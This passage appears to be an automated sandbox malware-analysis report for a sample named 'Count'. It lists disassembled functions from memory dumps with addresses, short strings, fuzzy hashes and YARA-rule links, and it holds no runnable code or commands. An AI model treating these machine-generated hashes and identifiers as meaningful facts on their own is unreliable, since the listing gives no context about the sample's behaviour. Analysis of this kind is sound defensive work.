Opcode Fuzzy Hash: 9487733ce4b9ee731c116c4d1eda8f779b8104bcaac7cff21526e96e6ffa56eb
Instruction Fuzzy Hash: 48A1FB34A10118DFCB44DFA8D998A9DB7B6FF89300F158559E906AB365DB30EC86CF80

Function 00B60868 Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

Te^q, xrefs: 00B60A5C

Memory Dump Source

Source File: 00000004.00000002.2028757237.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b60000_Count.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: c2930c53863daa5e261d66438f4977d614172e9496f277c36f6c5fc0bac32322
Instruction ID: 58236a52247bbb11c75be4ce768648de8a25e13e7425796c1ff6f6606a07a89f
Opcode Fuzzy Hash: c2930c53863daa5e261d66438f4977d614172e9496f277c36f6c5fc0bac32322
Instruction Fuzzy Hash: CF71DF347002049FC704EB69D948B6EBBE6FF89710F1084A9E409DB3A6DF75AC46CB91

Function 061D3030 Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

(bq, xrefs: 061D30A4

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 6328adb6e98f5d30ee1993c0153bc95421c0b2a3f848cc4a53ab0b710f4ae249
Instruction ID: a8ebc0804aeb93ff0c3250b8f568fdae2af8c4b4d1b9d55750baa6743c3d2b7b
Opcode Fuzzy Hash: 6328adb6e98f5d30ee1993c0153bc95421c0b2a3f848cc4a53ab0b710f4ae249
Instruction Fuzzy Hash: 9151D435A006168FCB41DF29C88496AFBB5FF8A320F1585A5E525DB382D730F845CBD1

Function 061D2070 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

pbq, xrefs: 061D2120

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: 21e85575d80079b7b68b1146ba483fce2d0bcd1ee89447655153eb774581b91c
Instruction ID: b0c2f61b9abeaed2881ed6ed6b084a6b8dcd15800bb950ec4c03a07a8bed2167
Opcode Fuzzy Hash: 21e85575d80079b7b68b1146ba483fce2d0bcd1ee89447655153eb774581b91c
Instruction Fuzzy Hash: DA515C76600104AFCB499FA8D914D5ABBF7FF8C3147168498E2098B376DB32DD22EB51

Function 061EFC08 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

4'^q, xrefs: 061EFC42

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 6bc5fef0b1e090d0ff6067d683e20f6527c92d5086158564e78b9c54a546671d
Instruction ID: ef96406d8c413b5bb1014489bf65c4c836094c17c7afb434f98fda1f8d70d089
Opcode Fuzzy Hash: 6bc5fef0b1e090d0ff6067d683e20f6527c92d5086158564e78b9c54a546671d
Instruction Fuzzy Hash: CE416634B10A148FCB84EB69C854A6EB7BBBFC9700F518529D413AB3A4DF749C46CB91

Function 061DFA80 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

4'^q, xrefs: 061DFB37

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 2e00888ae1480467784a781564adef2e4b3d5a2c1bb94ee2781f9ced43a48757
Instruction ID: a6d74bf048e7f81381ef026343dd241c9d015d2cb857b29552ef04b419b89d1b
Opcode Fuzzy Hash: 2e00888ae1480467784a781564adef2e4b3d5a2c1bb94ee2781f9ced43a48757
Instruction Fuzzy Hash: 67415B357406109FD348DB29C968F2A7BEAAB88700F118558E1068B3A5DF71EC428790

Function 061DFA90 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'^q, xrefs: 061DFB37

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: c9ae80e8ff013e5f9f8f03d9febedf20a45a99eb9048061d24701e9c27f955a4
Instruction ID: e43ab629c1a75affcc2dce519c6ab5832fa8576c25b71fb5fed482c903a2f1f4
Opcode Fuzzy Hash: c9ae80e8ff013e5f9f8f03d9febedf20a45a99eb9048061d24701e9c27f955a4
Instruction Fuzzy Hash: D2314D757406149FD348DB69C9A8F2A77E6ABCC750F108468E6068B3A5DF71EC42CB90

Function 061DB458 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

4'^q, xrefs: 061DB4A1

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 71f83f80b1ee0262ea1854f0f8905dddd49c7f60b4c07510de17198ebd7e41f2
Instruction ID: c5d9feebda1fe5a8c79c1ebc576608550c219d302e805f50fe7f9afdd3d4a602
Opcode Fuzzy Hash: 71f83f80b1ee0262ea1854f0f8905dddd49c7f60b4c07510de17198ebd7e41f2
Instruction Fuzzy Hash: 39318231B002149FCB499F64D954D9A7BB7FF88310B054469E90B9B365CB31DC43CB91

Function 061D6B6F Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

p<^q, xrefs: 061D6BBA

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: 85ae2ddf96d2ed6684084ef9377bf4d272aee1fe16bdce8410182895631d352d
Instruction ID: d64f99b0ea97aa9b4c8968496360dc80b017a86e36272a5abe87d29c77cfeb23
Opcode Fuzzy Hash: 85ae2ddf96d2ed6684084ef9377bf4d272aee1fe16bdce8410182895631d352d
Instruction Fuzzy Hash: AC213A717042449FDB56CE2AC884AAA7BE6EF8D214B0980A5F945CB3A1D735DC51CBA0

Function 061D6B80 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

p<^q, xrefs: 061D6BBA

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: 8c11bde6b90ce53d2c6f8c81c1862d8e94857fca17c8e6835daa95fab885978c
Instruction ID: fa728a35183d90075c7c1c2ae3d824447ddf1e05f1096bb2bb6380426b44620e
Opcode Fuzzy Hash: 8c11bde6b90ce53d2c6f8c81c1862d8e94857fca17c8e6835daa95fab885978c
Instruction Fuzzy Hash: 10213A713041549FCB55CF2AC880AAA7BEAEF89304F0980A5FD55CB3A1DB75DC51CBA0

Function 06121E8C Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06122659

Memory Dump Source

Source File: 00000004.00000002.2041396988.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6120000_Count.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 7ed2225f27cc3035982fd869d39b6c6d9845e4aff9ffc7ecc0b6984335dc2595
Instruction ID: a95b9ee1291a62a300202906325c0e64e26d98085e7c0a90aa7cf56392d3265d
Opcode Fuzzy Hash: 7ed2225f27cc3035982fd869d39b6c6d9845e4aff9ffc7ecc0b6984335dc2595
Instruction Fuzzy Hash: 5731E270E0426ADFDB59CFA5D5446FEBBB1FF85301F00806AD921A7291D7380A99CF91

Function 0551B24A Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

*, xrefs: 0551B2E1

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: 775c541a52acf1557564d2c54743839c41ff4f4618e1fbcef8f3560a2cce802d
Instruction ID: 4f06642fe290baccf4a313fa04f7e8ad0f6d23bdbf1eab90dfc8d6dcdcef0024
Opcode Fuzzy Hash: 775c541a52acf1557564d2c54743839c41ff4f4618e1fbcef8f3560a2cce802d
Instruction Fuzzy Hash: 9521E674905268CFDB61DF28D888BEDBBB2FF49300F0085D9D549A72A1DB305A85DF45

Function 0551AA1B Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

C, xrefs: 0551AA4B

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID: C
API String ID: 0-1037565863
Opcode ID: 0d1d00d9cbb1c9a4c259dc2cef4e500799da37b4c289d8af6d8fdfbec9b294c0
Instruction ID: 82a8fb20a2465bc6b5b7222d401104f7e4ca46b742f09bc91ddac08334e59569
Opcode Fuzzy Hash: 0d1d00d9cbb1c9a4c259dc2cef4e500799da37b4c289d8af6d8fdfbec9b294c0
Instruction Fuzzy Hash: BD21F370A01258DFDB64DF28D894BADBBB1FF44300F1084AAE509AB290DB319E85DF45

Function 060F15C0 Relevance: 1.3, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 060F1633

Memory Dump Source

Source File: 00000004.00000002.2041242595.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60f0000_Count.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 38d061a5de6a77b191019f2318b95402588cbfd575eed06915e3d0a887e7fc48
Instruction ID: 16b7ab53dd7dd31a42a338778cec1c059035a63c1ddd02499f8d0bc8635bce08
Opcode Fuzzy Hash: 38d061a5de6a77b191019f2318b95402588cbfd575eed06915e3d0a887e7fc48
Instruction Fuzzy Hash: 7C1167B5900248CFCB10DFA9C9447EEFFF5AF48320F148819E519A7250C7359544CF90

Function 05513F49 Relevance: 1.3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

Strings

!, xrefs: 05514C9B

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: 418e4dee14b8b0de0bd9fa201cc5c31525103c9fdda06c4a1c481c90b08e896d
Instruction ID: 5139f6a6e883f2e0a09249d825b1d061428e865490d1f25a311977323e5527de
Opcode Fuzzy Hash: 418e4dee14b8b0de0bd9fa201cc5c31525103c9fdda06c4a1c481c90b08e896d
Instruction Fuzzy Hash: AE213470904228CFEB64DF65D855B9DBBB2BB48300F0094EA994DA7295DB384ECACF05

Function 060F15C8 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 060F1633

Memory Dump Source

Source File: 00000004.00000002.2041242595.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60f0000_Count.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4448cb15d3913a7c6a096c6ab694ee91f3658067b86ccbb21aeedfd7bd146e77
Instruction ID: b87a7eb9998a232c9eeec22bef6f6dcd3c6f3eb7409ac50d731eee9175fc003e
Opcode Fuzzy Hash: 4448cb15d3913a7c6a096c6ab694ee91f3658067b86ccbb21aeedfd7bd146e77
Instruction Fuzzy Hash: D91134B19002488FCB10DFAAC844BEEFFF5EB88324F248419E559A7250CB75A544CFA4

Function 0551ACD8 Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

,, xrefs: 0551ADA2

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 21a6c1101514f2f02439c81f2b15dd158ec2f04a2684a02f2e38b4334502d74d
Instruction ID: d578ae60ba3dd0a347f6befd9f5ce2ddb6f16b8a02c740087c2016b39857902e
Opcode Fuzzy Hash: 21a6c1101514f2f02439c81f2b15dd158ec2f04a2684a02f2e38b4334502d74d
Instruction Fuzzy Hash: AF21B074A052288FDBA0DF68D854BEDBBB5FB49300F1080D9E949A7391DB305E8ADF41

Function 0551AF02 Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

;, xrefs: 0551AF0C

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: 1fd509e8742593375d01bb1af7ec2243a952c24c297132f0ad0cc6970db5bd46
Instruction ID: efd026bb24f65002a6304ef7d2c12aff872822f39cefcb734edb553afbe8505f
Opcode Fuzzy Hash: 1fd509e8742593375d01bb1af7ec2243a952c24c297132f0ad0cc6970db5bd46
Instruction Fuzzy Hash: 7221E470901618CFDB60DF28D858BE9BBB1FB48301F1040DAE509AB390CB315E89CF45

Function 0551B4F7 Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

., xrefs: 0551B55D

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 033837eced8d89c4fad93bdd92cc9e2eca0844987f253c6290d2c818e65a946c
Instruction ID: 2fa617545a7724c9e3e2e40efe4811211166239ea3d63650b9566cbd4c81421b
Opcode Fuzzy Hash: 033837eced8d89c4fad93bdd92cc9e2eca0844987f253c6290d2c818e65a946c
Instruction Fuzzy Hash: B01157709062588FDB54DF28E889FAC7BB2FB44304F5085DAD44AAB251DB305E86CF4A

Function 0551AAB5 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

B, xrefs: 0551AAC3

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID: B
API String ID: 0-1255198513
Opcode ID: 40440f353e948f05dd238cdc6eeab7492ad736800a30aef4609c045b4e7bf53c
Instruction ID: 4662f86b41c2abe341523988af1a8fdc518af57c1b2df02c6e97d24fac4776b0
Opcode Fuzzy Hash: 40440f353e948f05dd238cdc6eeab7492ad736800a30aef4609c045b4e7bf53c
Instruction Fuzzy Hash: 1B010870A01219CFDB64DF24D954BEABBB5FF44300F1085EA950EAB680DB305E89CF45

Function 0551AB56 Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

!, xrefs: 0551ABA4

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: eb3bbdbf8293fe9c8ae37fb0f720da7d7f082067c10e81a01743b98d8aeba534
Instruction ID: 290283ddedc4af05b98495b93d381d1575e7e0ecbedb52e9cf03f290db9cdd69
Opcode Fuzzy Hash: eb3bbdbf8293fe9c8ae37fb0f720da7d7f082067c10e81a01743b98d8aeba534
Instruction Fuzzy Hash: 8501D27080565AEBDB61DF58D844BD9BB72FF48300F00868AE949A7650DB30AA89DF85

Function 0551A789 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

4, xrefs: 0551B432

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: f031252faeebcd5f6562268e5e4b40b9463cd1b48f9b43f5f2bd48d48bbc8e7b
Instruction ID: 54920b91b7e69c5b7d2f2e76d0f613c515f009650d4e0b5328d862e71b982eae
Opcode Fuzzy Hash: f031252faeebcd5f6562268e5e4b40b9463cd1b48f9b43f5f2bd48d48bbc8e7b
Instruction Fuzzy Hash: 36011978906214CFDB51CF24C848BA8BBB1FF41301F1080DAD80AAB290CB318E8ACF45

Function 0551A9FE Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

., xrefs: 0551B55D

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: ea6af6c25af448d0255e2447df64eb129873475b23821266d42c37d4453541f0
Instruction ID: ed737df5a9320727fcd1ceb752432c70b4ac5fda9516492d29e807688d3b95a8
Opcode Fuzzy Hash: ea6af6c25af448d0255e2447df64eb129873475b23821266d42c37d4453541f0
Instruction Fuzzy Hash: E1F0C9709052188FDB64DF28D854BA9B7B6FB45304F5095D9D409AB291CB305E86CF46

Function 00B68A76 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

=, xrefs: 00B68AC9

Memory Dump Source

Source File: 00000004.00000002.2028757237.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b60000_Count.jbxd

Similarity

API ID:
String ID: =
API String ID: 0-2322244508
Opcode ID: 982512fb1184fc12d9c8fe80744f8f00ae51493d33e415d2b08000dbc3670d0d
Instruction ID: 489e14c345790a01929bc424792959819776c3442857dcfe2b6b041fc35affbe
Opcode Fuzzy Hash: 982512fb1184fc12d9c8fe80744f8f00ae51493d33e415d2b08000dbc3670d0d
Instruction Fuzzy Hash: C3F03A74805269CFEB21DF10DC847E8B7B1BF41314F1445EAC859A31C1DB754AA9CF01

Function 0551B3DB Relevance: 1.3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

Strings

4, xrefs: 0551B432

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 9e884c7883b8685871087fbbed1ea1605f406b8ed5705521e0e0bb2d52e70d0f
Instruction ID: 853869c9fb125d30354edabd7625ced72914c726186b519f0549b5f46bf4388a
Opcode Fuzzy Hash: 9e884c7883b8685871087fbbed1ea1605f406b8ed5705521e0e0bb2d52e70d0f
Instruction Fuzzy Hash: 26F0343880A228CFCB50DF24C848B98FFB1EF45305F1480DAD409AB2A1DB319A89CF41

Function 00B68DB9 Relevance: 1.3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

5, xrefs: 00B68E02

Memory Dump Source

Source File: 00000004.00000002.2028757237.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b60000_Count.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: 8ae36539ce6bd814fcdcabc623250c0f3b735a190aabbd4de2c3417f5c76d9a6
Instruction ID: b23393ba65efd7b5c32efaad436ab8d12b806aeb7d8a8bf644e05cf6d497d458
Opcode Fuzzy Hash: 8ae36539ce6bd814fcdcabc623250c0f3b735a190aabbd4de2c3417f5c76d9a6
Instruction Fuzzy Hash: 59F0AEB49056148FD761AB25E849B89BBF0FB09351F0080DAD549A32A0EB788A85DF09

Function 0551C58A Relevance: 1.3, Strings: 1, Instructions: 18COMMON

Download Yara Rule

Strings

, xrefs: 0551C5CA

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: dee7b1606db114e3cc383c6ef10160a652309dec022133f05ad6e7cfdfe91ab0
Instruction ID: 9aacea2289bc565ff3e90dd03ff2db18298e39e237a593fcb0171348a36f7f0c
Opcode Fuzzy Hash: dee7b1606db114e3cc383c6ef10160a652309dec022133f05ad6e7cfdfe91ab0
Instruction Fuzzy Hash: FFE0E5B5905218DFEB50CF54DC54FDABBB9FB48300F008196E54DEB284DA305A89CF55

Function 0551A7AE Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

., xrefs: 0551B55D

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: a365a411bdf2da5562c82ab8b5b1f822cd0d4714b3ee814d8f92d5d72c460a6c
Instruction ID: 1f859c5f7dd85188ec83a71de5f2fac18d9279847372b511a0be76e81667b0a3
Opcode Fuzzy Hash: a365a411bdf2da5562c82ab8b5b1f822cd0d4714b3ee814d8f92d5d72c460a6c
Instruction Fuzzy Hash: 81E01A74A051148FD754DF24D854BAABBB6FB49304F0091D9D80DA7391CB315E87CF45

Function 061E79B4 Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

G, xrefs: 061E79DA

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: 2e81abe77e01bf2ec14f97182ae25c7609bdb615836bc0f634b92b64e64ce233
Instruction ID: df0d6d93750aa3d8857c8cfbeaabb551c9ab60685ce3277c06b1a288a2d38b0c
Opcode Fuzzy Hash: 2e81abe77e01bf2ec14f97182ae25c7609bdb615836bc0f634b92b64e64ce233
Instruction Fuzzy Hash: 1EE092B4A05518CFEBA4CF58C880B99B7F2BB49310F1094D5E65CA3381C7309E84CF49

Function 061E1F63 Relevance: 1.3, Strings: 1, Instructions: 10COMMON

Download Yara Rule

Strings

*, xrefs: 061E1F8C

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID: *
API String ID: 0-163128923
Opcode ID: 0fa47b84ad647aa739862faa810edb9b60aaf0bcde9add4b8cbd30007842cb02
Instruction ID: 33b35146869cca629f2d4165cc853c43cbf36293deb177aedd026e509dae4404
Opcode Fuzzy Hash: 0fa47b84ad647aa739862faa810edb9b60aaf0bcde9add4b8cbd30007842cb02
Instruction Fuzzy Hash: 9BD09274E146689FDBA9DF60E880B8EB7F4BB06304F1059D9944CB7351DB70AE888F45

Function 061E9A42 Relevance: 1.3, Strings: 1, Instructions: 9COMMON

Download Yara Rule

Strings

w, xrefs: 061E9A66

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: 751ac88b4f312dc49287c4af420f2f9eef5d42280f9bf9264749d8470800215d
Instruction ID: 1701607740685fa23f6639b8bcd4363e2249c9458f8db81c626d88ca9eece090
Opcode Fuzzy Hash: 751ac88b4f312dc49287c4af420f2f9eef5d42280f9bf9264749d8470800215d
Instruction Fuzzy Hash: 65D09270904228CFDB65DB24DA84B88B774AF41314F0055A9800D67264D7306A89CF04

Function 05517AF0 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b761f75a836010c1be8bea8c11f2f51ab6a5c9b3d40a04b51d06af5e2148f031
Instruction ID: 6bf085aefc17264dbea1de47a1064d762239a8ba867b4a9518a8f3a847e2446d
Opcode Fuzzy Hash: b761f75a836010c1be8bea8c11f2f51ab6a5c9b3d40a04b51d06af5e2148f031
Instruction Fuzzy Hash: 2BC12770A10218DFDB94DF68E885BDDBBB6FB49300F1080A9E509A73A5DB305E89CF55

Function 05517AE1 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10efd2d4f3711aa11e76bc8efd7e965157c82695aef62d61f40b3cffccc4302f
Instruction ID: 49225e84a92d0322bae8cb5e990cdac5c455e322fd59b597dce4e745f8f9aa71
Opcode Fuzzy Hash: 10efd2d4f3711aa11e76bc8efd7e965157c82695aef62d61f40b3cffccc4302f
Instruction Fuzzy Hash: B4C12970A10218DFDB94DF68E845BDDBBB6FB49300F1080A9E509A7365DB305E8ACF55

Function 05517D85 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 591167bea20b6c83cd65421e63bbfd3ec9aeceac01ce93de73eb43585c4a5630
Instruction ID: ef4d333f5c757fdd2a737e9f453a1a692486605809dbc853db6c6a8093482059
Opcode Fuzzy Hash: 591167bea20b6c83cd65421e63bbfd3ec9aeceac01ce93de73eb43585c4a5630
Instruction Fuzzy Hash: 53C11874A10218DFDB94DF68E885B9DBBB6FB49300F1080A9E509E7365DB305E8ACF45

Function 061D33A8 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2e9cacbd2b9c481c006c18d3ccb27af9e8a11515b7096bb2962ce9ce1a050e4
Instruction ID: ad8216d3b2256a4b9a908e41ac411f153243316cea50ead5cad7b3af3ea2107a
Opcode Fuzzy Hash: f2e9cacbd2b9c481c006c18d3ccb27af9e8a11515b7096bb2962ce9ce1a050e4
Instruction Fuzzy Hash: 0081AC35B012148FCB45CF65D998AADBBF2EF89340F24446AE922EB390DB35DD81CB51

Function 061D8CF0 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
